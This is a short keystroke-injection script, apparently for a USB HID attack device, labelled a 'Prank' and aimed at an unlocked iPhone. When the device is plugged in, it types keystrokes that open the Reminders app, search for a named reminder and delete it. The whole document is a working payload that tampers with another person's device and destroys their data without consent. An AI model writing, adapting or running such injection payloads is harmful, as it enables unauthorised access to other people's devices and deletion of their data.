* REM #####################################################
* REM #                                                   |
* REM # Title        : Delete A Reminder With An iPhone   |
* REM # Author       : Aleff                              |
* REM # Version      : 1.0                                |
* REM # Category     : Prank                              |
* REM # Target       : iPhone                             |
* REM #                                                   |
* REM #####################################################

ATTACKMODE HID

* REM Requirements:
* REM     - The phone must be unlocked

QUACK REM VARIABLES
* REM 1) You need to change the name of the application according to the language you have on your phone.
REMINDER-APP-NAME='Promemoria'
* REM 2) You should know the reminder name that you want to delete
REMINDER-NAME='example'

QUACK DELAY 1500
QUACK GUI SPACE
QUACK DELAY 300
QUACK STRING $REMINDER-APP-NAME
QUACK ENTER
QUACK DELAY 2000
QUACK GUI f
QUACK DELAY 1000
QUACK STRING $REMINDER-NAME
QUACK DELAY 500
QUACK TAB
QUACK DELAY 500
QUACK GUI a
QUACK BACKSPACE
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK GUI h
